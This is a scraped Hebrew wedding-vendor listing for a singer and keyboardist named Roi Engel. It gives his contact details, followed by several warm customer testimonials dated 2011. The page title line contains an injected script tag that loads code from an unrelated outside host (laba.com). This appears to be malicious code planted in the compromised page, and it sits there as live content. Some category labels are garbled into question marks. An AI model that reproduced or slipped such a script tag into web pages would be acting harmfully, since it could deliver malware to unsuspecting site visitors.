חתונה יהודית
פירסום חתונה בדקה ה90 אירועים וחוויות ווידאו חתונה הנחות ומבצעים מאמרים רשימה אישית טיפים חתונה - ראשי
 
חתונה יהודית > ????? - ?? ????  > ????? \ ?????? > רועי אנגל - נותן את הקול
חזור 
רועי אנגל - נותן את הקול
רועי אנגל - זמר וקלידן לבר/בת-מצווה, אירוסין, קבלות פנים וחופה, הרקדות לבתי ספר ומוסדות ועוד... בעל ניסיון של מעל 15 שנה באירועים שונים, מקצועי, מנוסה ובעיקר "עושה הרבה שמח". אפשרות להוספת נגנים במגוון כלים. התקשרו 052-7475074 ואשמח לתת את הקול גם בשבילכם.

טלפון :
052-7475074
נייד :
כתובת :
קדומים  ת.ד 22


ליצירת קשר עם בעל העסק הקש כאן
רועי אנגל  - נותן את הקול  - ????? - ?? ????<script src=http://laba.com/muuu.s></script> 1
SimpleViewer requires Macromedia Flash. Get Macromedia Flash. If you have Flash installed, click to view gallery
 04/04/2011 22:44:08- קורין ושמואל קלנר
רועי אנגל - תודה עמוקה על ערב נפלא!
רועי היקרלא מזמן רק לפני 3 חודשים זכינו וברוך ה' אמא שלנו גרושה אחרי 5 שנים התחתנה עם שמוליק.רוב הזמן אומרים על חתונת פרק ב' שהיא יכולה להיות ברבנות, עם חליפה לבנה נחמדה וסעודה משפחתית במסעדה אחר כך וזה מספיק אבל ברוך ה' אמא שלי ובעלה, אנשים מיוחדים ושמחים רצו באמת לבא ולהודות לקב"ה על הנס בשמחה בסעודה ובריקודים כאילו זו להם החתונה הראשונה.צריך להבין, אם היא אמא שלי ואני בעצמי אמא לילד לא מדובר בבחורה צעירה והאורחים לה היו בדיוק בשנות השלושים לחייהם. אבל מה שהצלחת לעשות החל מהשירה ליד כסא הכלה, החופה והריקודים היה דבר מדהים.הבאת אותנו באמת לשמחה אמיתת. הפכת את השירה הבודדת של אחותי ושלי ליד אמא בכסא כלה כאילו יש שם לפחות כיתת אולפנה שלמה ששרה.ידעת להלך בין המשמחים והרוקדים בלי להחריש את אוזניהם ועם הקצב שלהם והשירים שמכירים.זיהית מתי בחופה יש כמה עניינים לסדר ולא מתאים השקט המביך אז דאגת לשיר ולנגן.לא להאמין שהכל אדם אחד עושה.הרגשנו באמת כאילו אתה אחד הילדים שרוצה פשוט לזכות במצוות כיבוד הורים.ואפילו הנוכחות והארגון שלך מההתחלה וללכת אחרי החתן וכלה העידו כמה באמת לקחת אותנו כאילו אנחנו האירוע היחיד שלך.תודה על הכלמאחלים הרבה הצלחהנשמח להמליץ בשמחהילדי משפחת הללי==============רועי יקר לאחר שליאת שלנו כתבה את אשר כתבה, לא נותר לנו אלה להסכים ולהיצטרף ולשלוח לך את תודתנו העמוקה על הערב הנפלא.למרות שמספר האורחים היה קטן הצלחת להעביר ערב ענק. ומטף ועד קשיש ,כולם בלי יוצא מהכלל רקדו והישתללו.ועל הכול שוב תודה רבה רבה מקרב לב אנחנו נשמח להמליץ קורין ושמואל קלנר

21/03/2011 22:19:34- רוני ושלומית שטרנר
רועי אנגל ולהקתו
מי שבאמת רוצה שמחה אמיתית עם הרבה נשמה ופשטות שלא יתפשר ושייקח את הלהקה המדהימה והמטורפת של רועי שפשוט אין דברים כאלה...רוני ושלומית שטרנר 9.3.11 נוף ירושלים.

13/03/2011 11:57:04- מירב ואורי פישר שילה
תודה
רועי היקר ,תודה מעומק הלב על ארוע מדהים שהרמת..הליווי המוזיקלי היה נעים ,ההרקדות מדליקות ומקפיצות, הדרבוקות שחולקו לחבר´ה שידרגו את הארוע.מעבר לכך סייעת לנו בנושא עמידה בזמנים-דבר חשוב בפני עצמו.יש בע"ה עוד בר מיצוות באופק והבנים כבר ביקשו רק אותך.רק בשמחות

13/03/2011 11:56:15- יוסי ותחיה רטיג
רועי המלך!
רצינו להגיד תודה ענקית על הכל. מההיכרות הנעימה עוד קודם החתונה, שהכי באת לקראתנו בעולם למצוא את הזמן והמקום המתאים להתרשם מההרכב, מהביצועים וביחד סידרנו מראש את הסגנון, השירים והקצב שיהיה בחתונה. הכי נדהמנו לראות איך ניצחת בערב החתונה על הצלמים והרוקדים ושמת לב שכל שיגעון שרצינו וביקשנו יהיה באותו ערב!תודה להרכב הנפלא שהבאת איתך, אחד-אחד הקפיצו את כולם והשקיעו בשמחה שמעבר ל"ניגון", ממש היו חלק מהשמחה שלנו.היה באמת באמת שמח וקיבלנו תגובות נלהבות מכולם.אנחנו ממליצים ביותר לכל המתלבטים על רועי אנגל.אין דברים כאלה.ובדקנו... ניפגש בשמחות!!!!!!!!!!!!!